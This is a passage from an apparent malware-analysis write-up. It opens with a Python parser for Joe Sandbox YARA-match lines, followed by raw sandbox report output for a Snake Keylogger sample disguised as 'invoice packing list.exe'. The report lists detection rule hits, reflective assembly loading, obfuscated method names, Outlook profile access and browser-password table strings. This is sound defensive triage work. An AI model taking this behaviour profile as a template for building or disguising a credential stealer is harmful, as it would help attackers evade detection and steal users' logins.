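# Split "k = v, k2 = v2" only at commas that begin a new "key = " pair, so a value that
# itself contains a comma ("scan_context = file, memory") is kept whole.
META_SPLIT_RE = re.compile(r",\s+(?=[A-Za-z_]\w*\s*=\s)")


def parse_meta(meta: str) -> dict:
    """Turn rule metadata ("os = windows, ..." or the short "Author: unknown" form) into a dict."""
    out = {}
    for chunk in META_SPLIT_RE.split(meta.strip()):
        if " = " in chunk:
            key, value = chunk.split(" = ", 1)
        elif ": " in chunk:
            key, value = chunk.split(": ", 1)
        else:
            continue
        out[key.strip().lower()] = value.strip()
    return out


def process_of(source: str) -> str:
    """Recover which analysed process a source belongs to from Joe Sandbox's naming."""
    if source.startswith("Process Memory Space:"):
        return "pid " + source.rsplit("PID:", 1)[1].strip()
    # "5.2.<name>.<addr>.<n>.unpack" and "00000005.00000002.<...>.sdmp" both lead with the process number.
    try:
        return "process %d" % int(source.split(".", 1)[0])
    except ValueError:
        return "unknown"


def parse_line(line: str):
    """Parse one 'Matched rule' line; returns None for any other kind of report line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "source": m["source"],
        "process": process_of(m["source"]),
        "type": m["type"],
        "rule": m["rule"],
        "meta": parse_meta(m["meta"]),
    }


def summarize(lines) -> dict:
    """Aggregate hits per rule: count, processes and region types hit, merged metadata."""
    by_rule = defaultdict(lambda: {"hits": 0, "processes": set(), "types": set(), "meta": {}})
    for line in lines:
        hit = parse_line(line)
        if hit is None:
            continue
        entry = by_rule[hit["rule"]]
        entry["hits"] += 1
        entry["processes"].add(hit["process"])
        entry["types"].add(hit["type"])
        for key, value in hit["meta"].items():
            entry["meta"].setdefault(key, value)  # first value seen wins
    return dict(by_rule)


# Constructed sample input: lines copied from the report above, in both the short summary form
# and the metadata form, including one with the glued "UNPACKEDPEMatched" extraction artefact.
SAMPLE_LINES = [
    "Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown",
    "Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23",
    "Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger",
    "Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23",
    "Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/",
]

if __name__ == "__main__":
    for rule, info in summarize(SAMPLE_LINES).items():
        print(rule, info["hits"], sorted(info["processes"]), sorted(info["types"]))
```

Feeding the whole "System Summary" block through summarize() gives one row per rule with the set of processes and region types it fired in; a rule that only fires as MEMORYSTR (string scan) and never on an unpacked PE is weaker evidence than one that hits the 0x400000 image of the child, and the per-rule fingerprint and clamav_sig values are what you would carry into a ticket or a blocklist.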
          Source: invoice packing list.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, BCWpgj8j50mWaxBvP6.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, BCWpgj8j50mWaxBvP6.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, BCWpgj8j50mWaxBvP6.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, BCWpgj8j50mWaxBvP6.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, BCWpgj8j50mWaxBvP6.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, BCWpgj8j50mWaxBvP6.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/1@3/3
Source: C:\Users\user\Desktop\invoice packing list.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice packing list.exe.log
Source: C:\Users\user\Desktop\invoice packing list.exe | Mutant created: NULL
Source: invoice packing list.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: invoice packing list.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\invoice packing list.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003206000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000324A000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003215000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003224000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4492388761.000000000405C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003257000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: invoice packing list.exe | ReversingLabs: Detection: 59%
Source: invoice packing list.exe | Virustotal: Detection: 60%
Source: unknown | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\invoice packing list.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\invoice packing list.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: invoice packing list.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: invoice packing list.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: invoice packing list.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: IhJW.pdb source: invoice packing list.exe
          Source: Binary string: IhJW.pdbSHA256N source: invoice packing list.exe

          Data Obfuscation

Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | .Net Code: J2WfKsWSxk System.Reflection.Assembly.Load(byte[])
Source: 0.2.invoice packing list.exe.38a80a8.1.raw.unpack, RK.cs | .Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | .Net Code: J2WfKsWSxk System.Reflection.Assembly.Load(byte[])
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | .Net Code: J2WfKsWSxk System.Reflection.Assembly.Load(byte[])
Source: 0.2.invoice packing list.exe.52e0000.6.raw.unpack, RK.cs | .Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_0270CE69 push es; iretd 0_2_0270CE76
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_02708EDD push ebx; iretd 0_2_02708EDF
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_0270CCE8 push cs; iretd 0_2_0270CCF6
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_0270CD40 push cs; iretd 0_2_0270CD4E
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_0270B370 push esp; iretd 0_2_0270B37F
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_02705338 pushfd ; iretd 0_2_02705342
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_02705871 pushfd ; iretd 0_2_02705876
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_0270590D pushfd ; iretd 0_2_02705916
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E22A11 pushfd ; iretd 0_2_04E22A12
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E294B8 pushad ; iretd 0_2_04E294C1
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E23458 pushad ; iretd 0_2_04E23466
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E29A38 pushad ; iretd 0_2_04E29A3D
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC7EF6 push es; ret 5_2_06BC7F4C
Source: invoice packing list.exe | Static PE information: section name: .text entropy: 7.772898722324074
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, XZ1it8U9PwDjdP7gXi.cs | High entropy of concatenated method names: 'CRZGN9kx6J', 'R8CGA8OHXp', 'jrIGrlae60', 'RXNG5wq5YG', 'o1TSfLVHTNeDfVf3INo', 'DdiQ5KVinI0jkqm4hNH', 'o4Hd5lVrVvmPy7ZufF2', 'S1SUy7VZoEQpEtPX6qG'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, zSiLhA2jy2oTvl6tbs.cs | High entropy of concatenated method names: 'qUoKs99lB', 'LlMYYM6G6', 'vRNaVVKpb', 'yqv4ph6bv', 'Rjcj6Fs4x', 'FaLZ3H8h3', 'D5acoEfUKcP3Zg9E7G', 't1HSwl05RVYmIyjq7K', 'DLrBAS1PT', 'mlPVHZ8qx'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, UCgCHyZk2L11G2cjVp.cs | High entropy of concatenated method names: 'IthPW1xAmO', 'CmNP4IdRdG', 'sYKmlv6yOI', 'gyXmeep86u', 'kIqmCsIcwY', 'pEQmSTySWH', 'RKemDldfUQ', 'Lytmu4i1xB', 'M8LmRFqoQP', 'EJsm3bIT70'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, khg9ERRp3gHWVtiDLt.cs | High entropy of concatenated method names: 'NSKkLdn3E7', 'wkWk9yoRFD', 'pGvkKvEnjv', 'lUskYg6uwV', 'wNVkWgWdOx', 'pu9ka3hNQQ', 'afYk4EnTMT', 'gj7k8sGyr7', 'h9ikjAG620', 'GubkZajCWr'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, RGlWmwje7LtvZq0b4l.cs | High entropy of concatenated method names: 'Oi5mY96SWr', 'co5ma2uxTa', 'rxAm8otwLu', 'DHwmjEe7dj', 'zV6mGd0yP9', 'viHmTFhVaJ', 'n2JmxhU7jj', 'QuUmBqaI5q', 'LtZmhiYiO7', 'fV2mVNZF1k'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, DvPB97fbEbk6oqcSaO.cs | High entropy of concatenated method names: 'niWIkCWpgj', 'E50I0mWaxB', 'Ue7IELtvZq', 'kb4IvloCgC', 'bcjIGVpKeC', 'Cy8ITqdFGi', 'VZR9gm3M9o7xsHgeRQ', 'fFOOQ8NZcDkEOEDiV9', 'p4bIIJmaHs', 'ylMIywI9yG'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, j1gFGoXv2S6nIHvGHT.cs | High entropy of concatenated method names: 'ToString', 'NTtT7NW4tR', 'iGqTnMg16J', 'YQJTl5AaeT', 'f26TeMjAkL', 'IT8TCEK5nK', 'FpETSY3k8Q', 'AwWTDGMUdi', 'FnZTuoOF2Z', 'd0bTRJgv1P'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, a284xdII5yLBtRLk15W.cs | High entropy of concatenated method names: 'Bb7V5FjYke', 'a8XVzvPDMl', 'kiPcOsNUNr', 'IaHcIjUPGf', 'J0Ic2Gu9F6', 'Gpacy8EMeC', 'DoZcf6nloe', 'APccbfPfLw', 'nZYcHit2wM', 'bPvcQjhvcR'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, xoB6256fyHcwTsGSFY.cs | High entropy of concatenated method names: 'AewF8cr0yT', 'xpTFjpdHTW', 'desFqD70b7', 'TnbFnBfbFT', 'luVFeyr7sF', 'gOYFCTQctY', 'u0wFDg1BCR', 'oKkFuZUBln', 'mUxF3ybs0I', 'ieQF73tp99'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, Q95703IO9rX5a8MElxl.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'maRV7BOeyn', 'R8TVtuy3as', 'RtHV6Ey4GS', 'LEYVJiM15u', 'yorVULmkZY', 'JbZVXBR2nD', 'Wy4V1iebwv'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | High entropy of concatenated method names: 'b51ybtIs57', 'IZ9yHXjGXC', 'H5gyQmo4LD', 'MBjymjhdjO', 'IPoyPtwryf', 'qaQyM9eeb6', 'xWcykCP1qW', 'ER0y0EOZLQ', 'KJIyglWeL8', 'Ct7yERpdAy'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, zeC4y8qqdFGihnfe7F.cs | High entropy of concatenated method names: 'AVHMbfJXTp', 'zK9MQORnWo', 'aHPMPRwGin', 'BikMkfAaY3', 'D8gM0uFn6k', 'GwEPoXog5n', 'EaRPwxqhYg', 'QEgPNngK8W', 'gcqPAXGRKM', 'Df1Pr6IySE'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, WW3P9p5VnJt57g3Q1E.cs | High entropy of concatenated method names: 'do9VmVJewj', 'j7EVP5eGp5', 'cKYVMNqiCv', 'kqbVkPd1SV', 'yIHVhEriNh', 'TpDV0KhjWu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, EyMo88rs0Ara9Txj0w.cs | High entropy of concatenated method names: 'PKShqKRLin', 'yk2hnAJltv', 'jdfhlVUD9w', 'oi4heHIGMi', 'stfhCDbg1m', 'YTghSELsZN', 'eMihDwpFDW', 'FeRhu21r2D', 'LSxhRsdb1W', 'Aggh3L4sEG'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, Ud9QceN44K6Mw96FA1.cs | High entropy of concatenated method names: 'NPBhGFOeiI', 'b0Rhx7rZJ7', 'DUOhhZnxZO', 'WjshcQuA0b', 'DDshp6LfX6', 'qTDhiNfcK5', 'Dispose', 'bDVBHpkZeg', 'OotBQLP8Bv', 'f01BmQCl9e'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, dD0BVxQqWcHNl3EOSs.cs | High entropy of concatenated method names: 'Dispose', 'z6MIrw96FA', 'NWF2nsD7GB', 'wcJRF1gXwW', 'ToCI5PDimL', 'ca6IzdYJs2', 'ProcessDialogKey', 'L9j2OyMo88', 'w0A2Ira9Tx', 'E0w22AW3P9'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, u65AEyzuvTaiVXsVTe.cs | High entropy of concatenated method names: 'fDJVacQVCI', 'ckUV8vOMvo', 'WseVjpQcCv', 'mTBVqPQMDZ', 'Xw3VnjkjAq', 'ydHVePgxTu', 'tlJVCl2M73', 'thWViC8NHL', 'qPXVLotb1J', 'LeKV9ZoyXV'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, FR0QiRIfhQaCC6ovHDv.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fdpdh70MZR', 'k57dVL3dnn', 'z3adchBEu9', 'yDpddLYDXs', 'bfWdptaqj2', 'wBhdsdJy5S', 'VPXdiVxOGa'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, DS7BW0DFsb2tsRZAL8.cs | High entropy of concatenated method names: 'R96kHMshJB', 'lCUkmfLuc0', 'WYpkMfrhiW', 'hO6M5esJym', 'bAhMzeG4Gd', 'vv8kOYAvk3', 'bNYkIHi8vw', 'rllk28Ih9u', 'QYYkyB64au', 'DMskfQUrlU'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, BCWpgj8j50mWaxBvP6.cs | High entropy of concatenated method names: 'fcqQJ0xSkG', 'oAaQUWrGSX', 'eeKQX0YeEU', 'CwrQ1Ayhuf', 'Jc3QoP5WVj', 'OZZQwUWl6V', 'TLCQN7epej', 'jpaQAoNuxi', 'FX0QrWAqH6', 'gPtQ5JRLlS'
Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, sw2xZcJUwW7c0RvEVa.cs | High entropy of concatenated method names: 'FYRG3lU5I5', 'wVCGt2G5dp', 'NVmGJo30i9', 'kqSGUSgt0k', 'B4JGntLB34', 'bTLGlbkeha', 'n1pGeJed8O', 'IuAGCugQB9', 'FEOGS5Y9hn', 'm1gGD8nZYJ'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, XZ1it8U9PwDjdP7gXi.cs | High entropy of concatenated method names: 'CRZGN9kx6J', 'R8CGA8OHXp', 'jrIGrlae60', 'RXNG5wq5YG', 'o1TSfLVHTNeDfVf3INo', 'DdiQ5KVinI0jkqm4hNH', 'o4Hd5lVrVvmPy7ZufF2', 'S1SUy7VZoEQpEtPX6qG'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, zSiLhA2jy2oTvl6tbs.cs | High entropy of concatenated method names: 'qUoKs99lB', 'LlMYYM6G6', 'vRNaVVKpb', 'yqv4ph6bv', 'Rjcj6Fs4x', 'FaLZ3H8h3', 'D5acoEfUKcP3Zg9E7G', 't1HSwl05RVYmIyjq7K', 'DLrBAS1PT', 'mlPVHZ8qx'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, UCgCHyZk2L11G2cjVp.cs | High entropy of concatenated method names: 'IthPW1xAmO', 'CmNP4IdRdG', 'sYKmlv6yOI', 'gyXmeep86u', 'kIqmCsIcwY', 'pEQmSTySWH', 'RKemDldfUQ', 'Lytmu4i1xB', 'M8LmRFqoQP', 'EJsm3bIT70'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, khg9ERRp3gHWVtiDLt.cs | High entropy of concatenated method names: 'NSKkLdn3E7', 'wkWk9yoRFD', 'pGvkKvEnjv', 'lUskYg6uwV', 'wNVkWgWdOx', 'pu9ka3hNQQ', 'afYk4EnTMT', 'gj7k8sGyr7', 'h9ikjAG620', 'GubkZajCWr'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, RGlWmwje7LtvZq0b4l.cs | High entropy of concatenated method names: 'Oi5mY96SWr', 'co5ma2uxTa', 'rxAm8otwLu', 'DHwmjEe7dj', 'zV6mGd0yP9', 'viHmTFhVaJ', 'n2JmxhU7jj', 'QuUmBqaI5q', 'LtZmhiYiO7', 'fV2mVNZF1k'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, DvPB97fbEbk6oqcSaO.cs | High entropy of concatenated method names: 'niWIkCWpgj', 'E50I0mWaxB', 'Ue7IELtvZq', 'kb4IvloCgC', 'bcjIGVpKeC', 'Cy8ITqdFGi', 'VZR9gm3M9o7xsHgeRQ', 'fFOOQ8NZcDkEOEDiV9', 'p4bIIJmaHs', 'ylMIywI9yG'
